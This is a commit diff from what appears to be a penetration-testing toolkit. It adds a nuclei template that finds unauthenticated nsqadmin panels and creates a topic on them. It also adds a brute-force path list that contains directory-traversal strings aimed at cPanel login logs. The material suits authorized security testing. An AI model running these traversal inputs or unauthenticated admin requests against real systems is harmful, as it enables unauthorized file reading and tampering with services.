add config/51pwn/nsqd.yaml 2023-04-25

GhostTroops · Apr 25, 2023 · fcc6750 · fcc6750
1 parent 012c375
commit fcc6750
Show file tree

Hide file tree

Showing 4 changed files with 76 additions and 2 deletions.
diff --git a/brute/dicts/filedic.txt b/brute/dicts/filedic.txt
@@ -2,6 +2,7 @@
 /login.jsp
 /stats.json
 /.well-known/security.txt
+/admin/export?format=json
 ../../../../../../../../../../../../../../../../../../usr/local/cpanel/logs/login_log%00
 ../../../../../../../../../../../../../../../../../../usr/local/cpanel/logs/login_log
 ../../../../../../../../../../../../../../../../../usr/local/cpanel/logs/login_log

diff --git a/config/51pwn/nsqd.yaml b/config/51pwn/nsqd.yaml
@@ -0,0 +1,73 @@
+id: 51pwn_nsqd_admin
+info:
+  name: 51pwn_nsqd_admin
+  severity: high
+  author:
+  - 51pwn
+  description: |-
+    default nsqd admin
+    pkill -9 nsqlookupd nsqd nsqadmin
+    ./nsqlookupd &
+    ./nsqd --lookupd-tcp-address=127.0.0.1:4160 &
+    ./nsqadmin --lookupd-http-address=127.0.0.1:4161 --http-address=0.0.0.0:8761 &
+    http://192.168.1.172:8761/lookup
+
+    pkill -9 nsqlookupd nsqd nsqadmin
+    /usr/bin/curl -d 'hello world 1' -XPOST 'http://127.0.0.1:4151/pub?topic=hello%20word'
+    /usr/bin/curl  -XPOST 'http://127.0.0.1:4151/api/topic/create?topic=_51pwn&channel=_51pwn'
+    nuclei -duc -t config/51pwn/nsqd.yaml -u http://127.0.0.1:8761
+requests:
+  # - raw:
+  #     - |
+  #       GET {{path1}} HTTP/1.1
+  #       Host: {{Hostname}}
+
+  #   payloads:
+  #     path1:
+  #       - "/"
+  #       - "/lookup"
+  #   attack: clusterbomb
+  #   stop-at-first-match: true
+  #   matchers:
+  #     - type: word
+  #       part: body
+  #       words:
+  #       - '<title>nsqadmin</title>'
+  #       - "var USER_AGENT = 'nsqadmin/"
+  #       - 'var NSQLOOKUPD = ["'
+  #       condition: and
+  - raw:
+      - |
+        POST /api/topics HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 29
+        Accept: application/vnd.nsq; version=1.0
+        X-UserAgent: nsqadmin/v1.2.1
+        DNT: 1
+        X-Requested-With: XMLHttpRequest
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+        Content-Type: application/json
+        Origin: http://{{Hostname}}
+        Referer: http://{{Hostname}}/lookup
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-US,en;q=0.9
+        Connection: close
+
+        {"topic":"xx","channel":"xx"}
+        
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+        - '"message":""'
+        - '{'
+        - '}'
+        condition: and
+
+    redirects: false
+
diff --git a/config/nuclei-templates b/config/nuclei-templates
diff --git a/tools/The-Hacker-Recipes b/tools/The-Hacker-Recipes